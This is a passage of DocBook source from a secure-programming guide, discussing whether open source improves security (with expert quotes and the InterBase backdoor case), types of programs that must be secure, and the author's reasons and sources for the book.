<listitem><para>
Most security people are not programmers.
This was a statement made by some Bugtraq contributors, but it's not clear
that this claim is really true.
</para></listitem>
<listitem><para>
Most computer security models are terrible.
</para></listitem>
<listitem><para>
There is lots of ``broken'' legacy software.
Fixing this software (to remove security faults or to make it work with
more restrictive security policies) is difficult.
</para></listitem>
<listitem><para>
Consumers don't care about security.
(Personally, I have hope that consumers are beginning to care about security;
a computer system that is constantly exploited is neither useful
nor user-friendly.
Also, many consumers are unaware that there's
even a problem, assume that it can't happen to them, or think that
that things cannot be made better.)
</para></listitem>
<listitem><para>
Security costs extra development time.
</para></listitem>
<listitem><para>
Security costs in terms of additional testing
(red teams, etc.).
</para></listitem>
</itemizedlist>
</para>
</sect1>

<sect1 id="open-source-security">
<title>Is Open Source Good for Security?</title>

<para>
There's been a lot of debate by security practitioners
about the impact of open source approaches on security.
One of the key issues is that open source exposes the source code
to examination by everyone, both the attackers and defenders,
and reasonable people disagree about the ultimate impact of this situation.
(Note - you can get the latest version of this essay by going to the
main website for this book,
<ulink url="http://www.dwheeler.com/secure-programs">
http://www.dwheeler.com/secure-programs</ulink>.
</para>

<sect2 id="open-source-security-experts">
<title>View of Various Experts</title>

<para>
First, let's exampine what security experts have to say.
</para>

<para>
Bruce Schneier is a well-known expert on computer security and cryptography.
He argues that smart engineers should ``demand
open source code for anything related to security'' [Schneier 1999],
and he also discusses some of the preconditions which must be met to make
open source software secure.
<!-- http://www.counterpane.com/crypto-gram-0205.html#1
Probably too detailed...
A basic rule of cryptography is to use published, public,
algorithms and protocols.
This principle was first stated in 1883 by Auguste Kerckhoffs:
in a well-designed cryptographic system, only the key needs to be secret;
there should be no secrecy in the algorithm.
Modern cryptographers have embraced this principle, calling
anything else "security by obscurity."
Any system that tries to keep its algorithms secret for security reasons
is quickly dismissed by the community, and referred to as "snake oil"
or even worse.
This is true for cryptography, but the general relationship between secrecy and security is more complicated than Kerckhoffs' Principle indicates. ...
Kerckhoffs' Principle generalizes to the following design guideline:
minimize the number of secrets in your security system.
To the extent that you can accomplish that,
you increase the robustness of your security.
To the extent you can't, you increase its fragility.
-->
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES)
encryption algorithm, believes that
the open source nature of Linux
provides a superior vehicle to making security vulnerabilities easier
to spot and fix, ``Not only because more people can look at it, but,
more importantly, because the model forces people to write more clear
code, and to adhere to standards. This in turn facilitates security review''
[Rijmen 2000].
</para>

<para>
Elias Levy (Aleph1) is the former moderator of one of the most
popular security discussion groups - Bugtraq.
He discusses some of the problems in making open source
software secure in his article
<ulink url="http://www.securityfocus.com/commentary/19">"Is Open Source
Really More Secure than Closed?"</ulink>.
His summary is:
<blockquote>
<para>
So does all this mean Open Source Software is no better than closed
source software when it comes to security vulnerabilities? No. Open
Source Software certainly does have the potential to be more secure
than its closed source counterpart.
But make no mistake, simply being open source is no guarantee of security.
</para>
</blockquote>
</para>

<para>
Whitfield Diffie is the
co-inventor of public-key cryptography (the basis of all Internet security)
and chief security officer and senior staff engineer at Sun Microsystems.
In his 2003 article
<ulink url="http://zdnet.com.com/2100-1107-980938.html">
Risky business: Keeping security a secret</ulink>,
he argues that proprietary vendor's claims that their software
is more secure because it's secret is nonsense.
He identifies and then counters two main claims made by proprietary vendors:
(1) that release of code benefits attackers more than anyone else because
a lot of hostile eyes can also look at open-source code, and
that (2) a few expert eyes are better than several random ones.
He first notes that while giving programmers access to a piece of software
doesn't guarantee they will study it carefully,
there is a group of programmers who can be expected to care deeply:
Those who either use the software personally or work for an
enterprise that depends on it.
"In fact, auditing the programs on which an enterprise depends for
its own security is a natural function of the enterprise's own
information-security organization."
He then counters the second argument, noting that
"As for the notion that open source's usefulness to opponents
outweighs the advantages to users, that argument flies in
the face of one of the most important principles in security:
A secret that cannot be readily changed should be regarded as a vulnerability."
He closes noting that
<blockquote>
<para>
"It's simply unrealistic to depend on secrecy for security in
computer software.
You may be able to keep the exact workings of the program out of general
circulation, but can you prevent the code from being
reverse-engineered by serious opponents? Probably not."
</para>
</blockquote>


</para>

<para>
John Viega's article
<ulink url="http://dev-opensourceit.earthweb.com/news/000526_security.html">"The Myth of Open Source Security"</ulink> also discusses
issues, and summarizes things this way:
<blockquote>
<para>
Open source software projects can be more secure than closed
source projects. However, the very things that can make open
source programs secure -- the availability of the source code,
and the fact that large numbers of users are available to look
for and fix security holes -- can also lull people into a false
sense of security.
</para>
</blockquote>
</para>

<para>
<ulink url="http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html">Michael H. Warfield's "Musings on open source security"</ulink> is
very positive about the impact of open source software on security.
In contrast,
Fred Schneider doesn't believe that open source helps security, saying
``there is no reason to believe that the many eyes inspecting (open)
source code would be successful in identifying bugs that allow
system security to be compromised'' and claiming that
``bugs in the code are not the dominant means of attack'' [Schneider 2000].
He also claims that open source rules out control of the construction
process, though in practice there is such control - all major open source
programs have one or a few official versions with ``owners'' with
reputations at stake.
Peter G. Neumann discusses ``open-box'' software (in which source code
is available, possibly only under certain conditions), saying
``Will open-box software really improve system security?
My answer is not by itself, although the potential is considerable''
[Neumann 2000].
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
has developed a paper on why they believe open source is more
effective for security [TruSecure 2001].
<ulink url="http://www-106.ibm.com/developerworks/linux/library/l-oss.html?open&amp;I=252,t=gr,p=SeclmpOS">Natalie Walker Whitlock's IBM DeveloperWorks article</ulink>
discusses the pros and cons as well.
Brian Witten, Carl Landwehr, and Micahel Caloyannides [Witten 2001]
published in IEEE Software an article tentatively concluding that
having source code available should work in the favor of system security;
they note:
<blockquote>
<para>
``We can draw four additional conclusions from this discussion. First,
access to source code lets users improve system security -- if they have
the capability and resources to do so. Second, limited tests indicate that
for some cases, open source life cycles produce systems that are less
vulnerable to nonmalicious faults. Third, a survey of three operating
systems indicates that one open source operating system experienced less
exposure in the form of known but unpatched vulnerabilities over a 12-month
period than was experienced by either of two proprietary counterparts.
Last, closed and proprietary system development models face disincentives
toward fielding and supporting more secure systems as long as less secure
systems are more profitable. Notwithstanding these conclusions, arguments
in this important matter are in their formative stages and in dire need of
metrics that can reflect security delivered to the customer.''
</para>
</blockquote>
</para>

<para>
Scott A. Hissam and Daniel Plakosh's
<ulink url="http://www.ics.uci.edu/~wscacchi/Papers/New/IEE_hissam.pdf">
``Trust and Vulnerability in Open Source Software''</ulink>
discuss the pluses and minuses of open source software.
As with other papers, they note that just because the software
is open to review, it should not automatically follow that
such a review has actually been performed.
Indeed, they note that this is a general problem for all software,
open or closed - it is often questionable if many people examine any
given piece of software.
One interesting point is that they demonstrate that
attackers can learn about a
vulnerability in a closed source program (Windows)
from patches made to an OSS/FS program (Linux).
In this example,
Linux developers fixed a vulnerability before attackers tried to attack it,
and attackers correctly surmised that a similar problem might be still be in
Windows (and it was).
Unless OSS/FS programs are forbidden, this kind of learning is difficult
to prevent.
Therefore, the existance of an OSS/FS program can reveal the vulnerabilities
of both the OSS/FS and proprietary program performing the same function -
but at in this example, the OSS/FS program was fixed first.
</para>
</sect2>

<sect2 id="open-source-security-nohalt">
<title>Why Closing the Source Doesn't Halt Attacks</title>

<para>
It's been argued that a
system without source code is more secure because,
since there's less information available for an attacker, it should
be harder for an attacker to find the vulnerabilities.
This argument has a number of weaknesses, however, because
although source code is extremely important when trying to add
new capabilities to a program,
attackers generally don't need source code to find a vulnerability.
</para>

<para>
First, it's important to distinguish between ``destructive'' acts
and ``constructive'' acts. In the real world, it is much easier to
destroy a car than to build one. In the software world, it is
much easier to find and exploit a vulnerability than to
add new significant new functionality to that software.
Attackers have many advantages against defenders because of this difference.
Software developers must try to have no security-relevant mistakes
anywhere in their code, while attackers only need to find one.
Developers are primarily paid to get their programs to work...
attackers don't need to make the program work, they only need to
find a single weakness. And as I'll describe in a moment, it takes
less information to attack a program than to modify one.
</para>

<para>
Generally attackers (against both open and closed programs) start by
knowing about the general kinds of security problems programs have.
There's no point in hiding this information; it's already out, and
in any case, defenders need that kind of information to defend
themselves.
Attackers then use techniques to try to find those problems;
I'll group the techniques into ``dynamic'' techniques (where you
run the program) and ``static'' techniques (where you examine
the program's code - be it source code or machine code).
</para>

<para>
In ``dynamic'' approaches, an attacker runs the program,
sending it data (often problematic data), and sees
if the programs' response indicates a common vulnerability.
Open and closed programs have no difference here, since the attacker isn't
looking at code.

Attackers may also look at the code, the ``static'' approach.
For open source software, they'll
probably look at the source code and search it for patterns.
For closed source software, they might search the machine code
(usually presented in assembly language format to simplify the
task) for essentially the same patterns.
They might also use tools called
``decompilers'' that turn the machine code back into source code
and then search the source code for the vulnerable patterns
(the same way they would search for vulnerabilities in open source software).
See Flake [2001] for one discussion of how closed code can still be examined
for security vulnerabilities (e.g., using disassemblers).
This point is important:
even if an attacker wanted to use source code to find a vulnerability,
a closed source program has no advantage, because the attacker
can use a disassembler to re-create the source code of the product.
</para>

<para>
Non-developers might ask ``if decompilers can create source code
from machine code, then why do developers say they need
source code instead of just machine code?''
The problem is that although developers don't need source
code to find security problems, developers do need source code to make
substantial improvements to the program.
Although decompilers can turn machine code back into a
``source code'' of sorts, the resulting source code
is extremely hard to modify. Typically most understandable names are
lost, so instead of variables like ``grand_total'' you get
``x123123'', instead of methods like ``display_warning'' you get
``f123124'', and the code itself may have spatterings of
assembly in it.
Also, _ALL_ comments and design information are lost.
This isn't a serious problem for finding security problems, because
generally you're searching for patterns indicating vulnerabilities,
not for internal variable or method names.
Thus, decompilers can be useful for finding ways to attack programs,
but aren't helpful for updating programs.
</para>

<para>
Thus, developers will say ``source code is vital''
when they intend to add functionality), but the fact that the source
code for closed source programs is hidden doesn't protect the program
very much.
</para>

<!--
Thus, defenders won't usually look for problems if they
don't have the source code, so not having the source code puts defenders
at a disadvantage compared to attackers.
-->
</sect2>

<sect2 id="open-source-security-secrets">
<title>Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away</title>

<para>
Sometimes it's noted that a vulnerability that exists but is unknown
can't be exploited, so the system ``practically secure.''
In theory this is true, but the problem is that once someone finds
the vulnerability, the finder may just exploit
the vulnerability instead of helping to fix it.
Having unknown vulnerabilities doesn't really make the vulnerabilities go away;
it simply means that the vulnerabilities are a time bomb, with no
way to know when they'll be exploited.
Fundamentally, the problem of someone exploiting a vulnerability they
discover is a problem for both open and closed source systems.
</para>

<para>
One related claim sometimes made
(though not as directly related to OSS/FS)
is that people should not post warnings about
vulnerabilities and discuss them.
This sounds good in theory, but the problem is that attackers already
distribute information about vulnerabilities through a large number
of channels.
In short, such approaches would leave
defenders vulnerable, while doing nothing to inhibit attackers.
In the past, companies actively tried to prevent disclosure of vulnerabilities,
but experience showed that, in general, companies didn't fix vulnerabilities
until they were widely known to their users (who could then insist that
the vulnerabilities be fixed).
This is all part of the argument for ``full disclosure.''
Gartner Group has a blunt commentary in a CNET.com article titled
``Commentary: Hype is the real issue - Tech News.''
They stated:
<blockquote>
<para>
   The  comments  of  Microsoft's  Scott  Culp,  manager of the company's
   security  response  center,  echo  a common refrain in a long, ongoing
   battle   over  information.  Discussions  of  morality  regarding  the
   distribution of information go way back and are very familiar. Several
   centuries  ago,  for  example, the church tried to squelch Copernicus'
   and  Galileo's  theory  of  the  sun  being at the center of the solar
   system...

  Culp's  attempt  to blame "information security professionals" for the
   recent  spate  of  vulnerabilities  in  Microsoft  products is at best
   disingenuous.  Perhaps,  it  also  represents  an  attempt  to deflect
   criticism from the company that built those products...

   [The] efforts of all parties contribute to a continuous
   process  of improvement. The more widely vulnerabilities become known,
   the more quickly they get fixed.
</para>
</blockquote>
<!-- http://technews.netscape.com/news/0-1003-201-7573979-0.html -->
<!-- Here's the entire text of the article:
   The  comments  of  Microsoft's  Scott  Culp,  manager of the company's
   security  response  center,  echo  a common refrain in a long, ongoing
   battle   over  information.  Discussions  of  morality  regarding  the
   distribution of information go way back and are very familiar. Several
   centuries  ago,  for  example, the church tried to squelch Copernicus'
   and  Galileo's  theory  of  the  sun  being at the center of the solar
   system,  and in the 20th century Darwin's writings about the theory of
   evolution were banned in a number of states in the United States.

  Culp's  attempt  to blame "information security professionals" for the
   recent  spate  of  vulnerabilities  in  Microsoft  products is at best
   disingenuous.  Perhaps,  it  also  represents  an  attempt  to deflect
   criticism from the company that built those products.

   Culp  has  also  manufactured  some  new numbers related to the losses
   suffered  by  companies  because of the vulnerabilities in Microsoft's
   Internet  Information  Server  (IIS).  Culp  says the losses amount to
   billions  of  dollars.  Gartner  believes  that  hype  associated with
   security  risks  is  the  real problem, and that companies engaging in
   hype are culpable.

   Security  firms  and  professionals  have already begun to cut back on
   self-serving press releases and hyperbole while they also research and
   discover   new   vulnerabilities   and   responsibly  disseminate  new
   information.  Thus,  to criticize those contributions to awareness and
   early  warning while using unfounded numbers to make a point is a shot
   gone  astray  in  the  ongoing  battle between information freedom and
   control.

   In  truth,  the  responsibility  for information security falls to the
   entire  IT  community - - software  companies, security firms, businesses
   and  individuals.  None  should  shoulder the whole blame for security
   lapses.  Rather, the efforts of all parties contribute to a continuous
   process  of improvement. The more widely vulnerabilities become known,
   the more quickly they get fixed.
-->

<!--
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
May 13, 2002
Allchin: Disclosure May Endanger U.S.
By  Caron Carlson

...
He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed.
The bold statements and candid admissions were part of Jim Allchin's testimony during two days in court here before Judge Colleen Kollar-Kotelly, who is hearing the case of nine states and the District of Columbia seeking stricter penalties for Microsoft's antitrust behavior.
 Microsoft has already identified at least one protocol and two APIs that it plans to withhold from public disclosure under the security carve-out.

The protocol, which is part of Message Queuing, contains a coding mistake that would threaten the security of enterprise systems using it if it were disclosed, Allchin said.
When pressed for further details, Allchin said he did not want to offer specifics because Microsoft is trying to work on its reputation regarding security. "The fact that I even mentioned the Message Queuing thing bothers me," he said.


Note, however, that Microsoft code has already escaped!
Besides, it can be trivially disassembled.
-->
</para>
</sect2>

<sect2 id="open-source-security-trojans">
<title>How OSS/FS Counters Trojan Horses</title>


<para>
It's sometimes argued that open source programs, because there's no
enforced control by a single company, permit people to insert Trojan
Horses and other malicious code.
Trojan horses can be inserted into open source code, true, but they
can also be inserted into proprietary code.
A disgruntled or bribed employee can insert malicious code, and
in many organizations it's much less likely to be found than in an
open source program.
After all,
no one outside the organization can review the source code, and few
companies review their code internally (or, even if they do, few can
be assured that the reviewed code is actually what is used).
And the notion that a closed-source company can be sued later has little
evidence; nearly all licenses disclaim all warranties, and courts have
generally not held software development companies liable.
</para>

<para>
Borland's InterBase server is an interesting case in point.
Some time between 1992 and 1994, Borland inserted an intentional
``back door'' into their database server, ``InterBase''.
This back door allowed any local or remote user to
manipulate any database object and install arbitrary programs, and
in some cases could lead to controlling the machine as ``root''.
This vulnerability stayed in the product for at least 6 years - no one else
could review the product, and Borland had no incentive to remove the
vulnerability.
Then Borland released its source code on July 2000.
The "Firebird" project began working with the source code, and
uncovered this serious security problem
with InterBase in December 2000.
By January 2001 the CERT announced the existence of this back door as
<ulink url="http://www.cert.org/advisories/CA-2001-01.html">CERT
advisory CA-2001-01</ulink>.
What's discouraging is that the backdoor can be easily found simply by
looking at an ASCII dump of the program (a common cracker trick).
Once this problem was found by open source developers reviewing
the code, it was patched quickly.
You could argue that, by keeping the password unknown,
the program stayed safe, and that opening the source made
the program less secure.
I think this is nonsense, since ASCII dumps are trivial to do and well-known
as a standard attack technique, and not all attackers have sudden
urges to announce vulnerabilities - in fact, there's no way to be
certain that this vulnerability has not been exploited many times.
It's clear that after the source was opened, the source code was
reviewed over time, and the vulnerabilities found and fixed.
One way to characterize this is to say that the original code was
vulnerable, its vulnerabilities became easier to exploit
when it was first made open source,
and then finally these vulnerabilities were fixed.
<!--
     The 1992-1994 date is from
      http://slashdot.org/articles/01/01/11/1318207.shtml
  The December 2000 and other info is from:
  http://firebird.ibphoenix.com/home.nfs?a=ibphoenix&amp;s=979248432:339&amp;page=starkey
-->
</para>
</sect2>

<sect2 id="open-source-security-other">
<title>Other Advantages</title>


<para>
The advantages of having source code open extends not just to software
that is being attacked, but also extends to vulnerability assessment
scanners.
Vulnerability assessment scanners intentionally look for vulnerabilities
in configured systems.
A recent Network Computing evaluation found that the best scanner
(which, among other things, found the most legitimate vulnerabilities)
was Nessus, an open source scanner [Forristal 2001].
</para>
</sect2>

<sect2 id="open-source-security-bottom-line">
<title>Bottom Line</title>

<para>
So, what's the bottom line?
I personally believe that when a program began as closed source and
is then first made open source, it
often starts less secure for any users (through exposure of
vulnerabilities), and over time (say a few years) it has
the potential to be much more secure than a closed program.
If the program began as open source software, the public scrutiny is
more likely to improve its security before it's ready for use by
significant numbers of users, but there are several caveats to this
statement (it's not an ironclad rule).
Just making a program open source doesn't suddenly make a program secure,
and just because a program is open source does not guarantee security:
<itemizedlist>
<listitem><para>
First, people have to actually review the code.
This is one of the key points of debate - will people really
review code in an open source project?
All sorts of factors can reduce the amount of review:
being a niche or rarely-used product (where there are few potential reviewers),
having few developers, and use of a rarely-used computer language.
Clearly, a program that has a single developer and no other contributors
of any kind doesn't have this kind of review.
On the other hand, a program that has a primary author and many other
people who occasionally examine the code and contribute suggests that there
are others reviewing the code (at least to create contributions).
In general, if there are more reviewers, there's generally a higher likelihood
that someone will identify a flaw - this is the basis of the
``many eyeballs'' theory.
Note that, for example, the OpenBSD project continuously examines
programs for security flaws, so the components in its innermost parts
have certainly undergone a lengthy review.
Since OSS/FS discussions are often held publicly, this level of
review is something that potential users can judge for themselves.
</para>
<para>
One factor that can particularly reduce review likelihood is not actually
being open source.
Some vendors like to posture their ``disclosed source''
(also called ``source available'') programs as
being open source, but since the program owner has extensive exclusive rights,
others will have far less incentive to work ``for free'' for the owner
on the code.
Even open source licenses which have unusually
asymmetric rights (such as the MPL) have this problem.
After all, people are less likely to voluntarily participate
if someone else will have rights to their results that they don't have
(as Bruce Perens says, ``who wants to be someone else's unpaid employee?'').
In particular,
since the reviewers with the most incentive tend to be people trying to modify
the program, this disincentive to participate reduces the number of
``eyeballs''.
Elias Levy made this mistake in his article about open source
security; his examples of software that had been broken into
(e.g., TIS's Gauntlet) were not, at the time, open source.
</para></listitem>
<listitem><para>
Second, at least some of the people developing and
reviewing the code must know how to write secure programs.
Hopefully the existence of this book will help.
Clearly, it doesn't matter if there are ``many eyeballs'' if none of the
eyeballs know what to look for.
Note that it's not necessary for everyone to know how to write
secure programs, as long as those who do know how are examining the
code changes.
</para></listitem>
<listitem><para>
Third, once found, these problems need to be fixed quickly
and their fixes distributed.
Open source systems tend to fix the problems quickly, but the distribution
is not always smooth.
For example, the OpenBSD developers do an excellent job of reviewing code for
security flaws - but they don't always report the identified
problems back to the original developer.
Thus, it's quite possible for there to be a fixed version in one system,
but for the flaw to remain in another.
I believe this problem is lessening over time, since no one
``downstream'' likes to repeatedly fix the same problem.
Of course, ensuring that security patches are actually installed on
end-user systems is a problem for both open source and closed source software.
</para></listitem>
</itemizedlist>
Another advantage of open source is that, if you find a problem, you can
fix it immediately.
This really doesn't have any counterpart in closed source.
</para>

<!--
 Could quote some numbers.  More NT than Linux vulnerabilities found in 2000;
 more NT web sites defaced, too.  But it's hard to really quantify.
-->

<para>
In short, the effect on security of open source software
is still a major debate in the security community, though a large number
of prominent experts believe that it has great potential to be
more secure.
</para>

</sect2>
</sect1>

<sect1 id="types-of-programs">
<title>Types of Secure Programs</title>

<para>
Many different types of programs may need to be secure programs
(as the term is defined in this book).
Some common types are:

<itemizedlist>
<listitem>
<para>
Application programs used as viewers of remote data.
Programs used as viewers (such as word processors or file format viewers)
are often asked to view data sent remotely by an untrusted user
(this request may be automatically invoked by a web browser).
Clearly, the untrusted
user's input should not be allowed to cause the application
to run arbitrary programs.
It's usually unwise to support initialization macros (run when the data
is displayed); if you must, then you must create a secure sandbox
(a complex and error-prone task that almost never succeeds, which is why
you shouldn't support macros in the first place).
Be careful of issues such as buffer overflow, discussed in
<xref linkend="buffer-overflow">, which might
allow an untrusted user to force the viewer to run an arbitrary program.
</para>
</listitem>

<listitem>
<para>
Application programs used by the administrator (root).
Such programs shouldn't trust information that can be controlled
by non-administrators.
</para>
</listitem>

<listitem>
<para>
Local servers (also called daemons).
</para>
</listitem>

<listitem>
<para>
Network-accessible servers (sometimes called network daemons).
</para>
</listitem>

<listitem>
<para>
Web-based applications (including CGI scripts).
These are a special case of network-accessible servers, but they're
so common they deserve their own category.
Such programs are invoked indirectly via a web server, which filters out
some attacks but nevertheless leaves many attacks that must be withstood.
</para>
</listitem>

<listitem>
<para>
Applets (i.e., programs downloaded to the client for automatic execution).
This is something Java is especially famous for, though other languages
(such as Python) support mobile code as well.
There are several security viewpoints here; the implementer of the
applet infrastructure on the client side has to make sure that the
only operations allowed are ``safe'' ones, and the writer of an applet has
to deal with the problem of hostile hosts (in other words, you can't
normally trust the client).
There is some research attempting to deal with running applets on
hostile hosts, but frankly
I'm skeptical of the value of these approaches
and this subject is exotic enough that I don't cover it further here.
</para>
</listitem>

<listitem>
<para>
setuid/setgid programs.
These programs are invoked by a local user and, when executed, are
immediately granted the privileges of the program's owner and/or
owner's group.
In many ways these are the hardest programs to secure, because so many
of their inputs are under the control of the untrusted user and some
of those inputs are not obvious.
</para>
</listitem>

</itemizedlist>

</para>

<para>
This book merges the issues of these different types of program into
a single set.
The disadvantage of this approach is that some of the issues identified
here don't apply to all types of programs.
In particular, setuid/setgid programs have many surprising inputs and several
of the guidelines here only apply to them.
However, things are not so clear-cut, because
a particular program may cut across these boundaries (e.g., a CGI script
may be setuid or setgid, or be configured in a way that has the same effect),
and some programs are divided into several executables each of which
can be considered a different ``type'' of program.
The advantage of considering all of these program types together is that we can
consider all issues without trying to apply an inappropriate category
to a program.
As will be seen, many of the principles apply to all programs that
need to be secured.
</para>

<para>
There is a slight bias in this book toward programs written in
C, with some notes on other languages such as C++, Perl, PHP, Python,
Ada95, and Java.
This is because C is the most common language for
implementing secure programs on Unix-like systems
(other than CGI scripts, which tend to use languages such as
Perl, PHP, or Python).
Also, most other languages' implementations call the C library.
This is not to imply that C is somehow the ``best'' language for this purpose,
and most of the principles described here apply regardless of the
programming language used.
</para>

</sect1>

<sect1 id="paranoia">
<title>Paranoia is a Virtue</title>

<para>
The primary difficulty in writing secure programs is that
writing them requires a different mind-set, in short, a paranoid mind-set.
The reason is that the impact of errors (also called defects or bugs)
can be profoundly different.
</para>

<para>
Normal non-secure programs have many errors.
While these errors are undesirable, these errors usually
involve rare or unlikely situations, and if a user should stumble upon
one they will try to avoid using the tool that way in the future.
</para>

<para>
In secure programs, the situation is reversed.
Certain users will intentionally search out and cause rare or unlikely
situations, in the hope that such attacks will give them unwarranted privileges.
As a result, when writing secure programs, paranoia is a virtue.
</para>

</sect1>

<sect1 id="why-write">
<title>Why Did I Write This Document?</title>
<!-- ???: Okay, this doesn't really belong here, but I can't figure out
     where else to put it.  I don't want the introduction to get longer. -->
<!-- ???: http://www.wired.com/news/politics/0,1283,34865,00.html
      "Developers Blasted on Security", Reuters, 8:45 a.m. Mar. 9, 2000 PST
      Rich Pethia stated to the U.S. Congress that
     "There is little evidence of improvement in the security features of most
             products,"
      "Developers are not devoting sufficient effort to apply lessons
                         learned about the sources of vulnerabilities."
     Richard D. Pethia is manager of the SEI Survivable Systems
     Initiative and first manager of the CERT<52> Coordination Center (CERT<52>/CC).
     (see Spotlight . Volume 1 . Issue 3 . December 1998,
      "Interview with Richard D. Pethia" by Bill Pollak at
      http://interactive.sei.cmu.edu/Features/1998/December/Spotlight/spotlight_dec98.htm
      This interview states "The problem that I see is at the implementation
      level - the code that's going out today is just as buggy as the code
      that went out 10 years ago."


??? : Somehow add:
"A secure and Open society"
August 27, 1999
by  Michael MacMillan
http://www.itworldcanada.com/cw/archive/cw15-17/cw_wtemplate.cfm?filename=c1517n8.htm
 ITworldcanada.com
(interview with  Theo de Raadt,
head of the OpenBSD project, which is focused on security.
The problem with professional programmers is not a lack of ability,
but lack of attention to detail, he said.
...
The secret is straightforward - de Raadt and his peers assume that
every single bug found in the code occurs elsewhere.
de Raadt admits it sounds simple, but just rooting security bugs
out of the entire source tree took 10 full-time developers
one and a half years to complete.
"It?s a hell of a lot of work and I think that explains why it hasn't
been done by many people," he said.  www.openbsd.org.

???: add info about smartcards, e.g., how to code algorithms so the
key won't be exposed by power fluctuations.

-->


<para>
One question I've been asked is ``why did you write this book''?
Here's my answer:
Over the last several years I've noticed that many developers for
Linux and Unix
seem to keep falling into the same security pitfalls, again and again.
Auditors were slowly catching problems, but it would have been better
if the problems weren't put into the code in the first place.
I believe that part of the problem was that there wasn't a single, obvious
place where developers could go and get information on how to avoid
known pitfalls.
The information was publicly available, but it was often hard to find,
out-of-date, incomplete, or had other problems.
Most such information didn't particularly discuss Linux at all, even
though it was becoming widely used!
That leads up to the answer: I developed this book
in the hope that future software developers won't repeat
past mistakes, resulting in more secure systems.
You can see a larger discussion of this at
<ulink
url="http://www.linuxsecurity.com/feature_stories/feature_story-6.html">http://www.linuxsecurity.com/feature_stories/feature_story-6.html</ulink>.
</para>

<para>
A related question that could be asked is ``why did you write your own book
instead of just referring to other documents''?
There are several answers:

<itemizedlist>
<listitem>

<para>
Much of this information was scattered about; placing
the critical information in one organized document
makes it easier to use.
</para>
</listitem>
<listitem>

<para>
Some of this information is not written for the programmer, but
is written for an administrator or user.
</para>
</listitem>
<listitem>

<para>
Much of the available information emphasizes portable constructs
(constructs that work on all Unix-like systems), and
failed to discuss Linux at all.
It's often best to avoid Linux-unique abilities for portability's sake,
but sometimes the Linux-unique abilities can really aid security.
Even if non-Linux portability is desired, you may want to support
the Linux-unique abilities when running on Linux.
And, by emphasizing Linux, I can include references to information that
is helpful to someone targeting Linux that is not necessarily true for
others.
</para>
</listitem>

</itemizedlist>

</para>

</sect1>

<sect1 id="sources-of-guidelines">
<title>Sources of Design and Implementation Guidelines</title>

<para>
Several documents help describe how to write
secure programs (or, alternatively, how to find security problems in
existing programs), and were the basis for the guidelines highlighted
in the rest of this book.
<!-- ???: Add http://securityparadigm.com's "Computer Vulnerabilities" notes -->
<!-- ???: Add http://www.linuxhelp.org/lsap.shtml alternatively
    http://ferret.lmh.ox.ac.uk/~security
    Security-Audit's Frequently Asked Questions
     v 1.9 2000/03/21 01:01:08, Jeff Graham <lsap@demit.net> -->
<!-- I added fish (Dan Farmer's) refs at http://www.fish.com/security -->
<!-- ???  Really need to emphasize the risks of symbolic/hard links, esp.
     shared directories, such as /tmp.  Symbolic links to /dev/zero can
     really do bad things, symbolic links to /etc/passwd is of course
     an ancient attack.  -->
<!-- ??? Mention "terminal" and the possibility of retransmission back -->
<!-- ???: Traverse the Bugtraq archives, CERT advisories,
     MITRE's CVE at http://cve.mitre.org etc.
     to make sure I've covered the important stuff and pull out good
     examples/stories.  -->
<!-- ???: Add info and reference to
  Landwehr 1994.  Landwehr, Carl E., Alan R. Bull, John P. McDermott,
  and William S. Choi.  September 1994.
  A Taxonomy of Computer Program Security Flaws.
  ACM Computing Surveys. Vol. 26, No. 3.

http://scholar.lib.vt.edu/theses/available/etd-04252001-234145/
Lough, Daniel Lowry
"A Taxonomy of Computer Attacks with Applications to Wireless Network"
Published 2001.
Summary:
This research presents a comprehensive analysis of the types of attacks that are being leveled upon computer systems and the
construction of a general taxonomy and methodologies that will facilitate design of secure protocols. To develop a comprehensive
taxonomy, existing lists, charts, and taxonomies of host and network attacks published over the last thirty years are examined and
                        combined, revealing common denominators among them. These common denominators, as well as new information, are assimilated to
                        produce a broadly applicable, simpler, and more complete taxonomy. It is shown that all computer attacks can be broken into a taxonomy
                        consisting of improper conditions: Validation Exposure Randomness Deallocation Improper Conditions Taxonomy; hence described by the
                        acronym VERDICT.

                        The developed methodologies are applicable to both wired and wireless systems, and they are applied to some existing Internet attacks to
                        show how they can be classified under VERDICT. The methodologies are applied to the IEEE 802.11 wireless local area network protocol
                        and numerous vulnerabilities are found. Finally, an extensive annotated bibliography is included.

http://cr.yp.to/qmail/guarantee.html  Qmail
-->

</para>

<para>
For general-purpose servers and setuid/setgid programs, there are a number
of valuable documents (though some are difficult to find without
having a reference to them).
</para>


<para>
Matt Bishop [1996, 1997]
has developed several extremely valuable papers and presentations
on the topic, and in fact he has a web page dedicated to the topic at
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>.
AUSCERT has released a programming checklist
<ulink
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">[AUSCERT 1996]</ulink>,
based in part on chapter 23 of Garfinkel and Spafford's book discussing how
to write secure SUID and network programs
<ulink
url="http://www.oreilly.com/catalog/puis">[Garfinkel 1996]</ulink>.
<ulink
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">Galvin [1998a]</ulink> described a simple process and checklist
for developing secure programs; he later updated the checklist in
<ulink
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">Galvin [1998b]</ulink>.
<ulink
url="http://www.pobox.com/~kragen/security-holes.html">Sitaker [1999]</ulink>
presents a list of issues for the ``Linux security audit'' team to search for.
<ulink
url="http://www.homeport.org/~adam/review.html">Shostack [1999]</ulink>
defines another checklist for reviewing security-sensitive code.
The NCSA
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">[NCSA]</ulink>
provides a set of terse but useful secure programming guidelines.
Other useful information sources include the
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>
<ulink
url="http://www.whitefang.com/sup/">[Al-Herbish 1999]</ulink>,
the
<emphasis remap="it">Security-Audit's Frequently Asked Questions</emphasis>
<ulink
url="http://lsap.org/faq.txt">[Graham 1999]</ulink>,
and
<ulink
url="http://www.clark.net/pub/mjr/pubs/pdf/">Ranum [1998]</ulink>.
